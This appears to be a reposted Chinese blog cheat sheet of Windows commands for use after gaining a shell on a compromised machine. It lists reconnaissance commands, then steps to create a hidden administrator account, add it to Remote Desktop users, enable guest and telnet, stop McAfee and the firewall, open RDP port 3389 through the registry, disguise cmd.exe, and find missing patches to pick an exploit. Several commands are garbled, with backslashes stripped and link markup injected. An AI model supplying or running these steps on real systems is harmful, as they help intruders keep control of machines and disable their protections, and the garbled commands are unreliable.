拿下shell后提权命令

分享常用的DOS命令:
查看版本:ver
查看权限:whoami
查看配置:systeminfo
查看用户:net user
查看进程:tasklist
查看正在运行的服务:tasklist /svc
查看开放的所有端口:netstat -ano
查询管理用户名:query user
查看搭建环境:ftp 127.0.0.1
查看指定服务的路径:sc qc Mysql
添加一个用户:net user feizhu admin /add
将添加的用户提升到管理权限:net localgroup administrators feizhu /add
添加用户并提升权限:net user feizhu admin /add & net localgroup administrators feizhu /add
查看制定用户信息:net user feizhu
查看所有管理权限的用户:net localgroup administrators
加入远程桌面用户组:net localgroup “Remote Desktop Users” feizhu /add
突破最大连接数:mstsc /admin /v:127.0.0.1
删除用户:net user feizhu /del
删除管理员账户:net user administrator feizhu /del
更改系统登陆密码:net user feizhu feizhu... 修改feizhu用户密码为feizhu...
激活GUEST用户:net user guest /active:yes
开启TELNET服务:net start telnet
关闭麦咖啡:net stop “McAfee McShield”
关闭防火墙:net stop sharedaccess
查看当前目录的所有文件:dir c:windows
查看制定文件的内容:type c:windows1.asp
把cmd.exe复制到c:windows的temp目录下并命名为cmd.txt:copy c:windows empcookiescmd.exe c:windows empcmd.txt
开3389端口的命令:REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
查看补丁:dir c:windows>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type [a.txt|@find](mailto:a.txt%7C@find) /i [“%i”||@echo] (mailto:%E2%80%9C%i%E2%80%9D%7C%7C@echo)%i Not Installed!)&del /f /q /a a.txt

原文地址:https://www.cnblogs.com/yjxing/p/11504594.html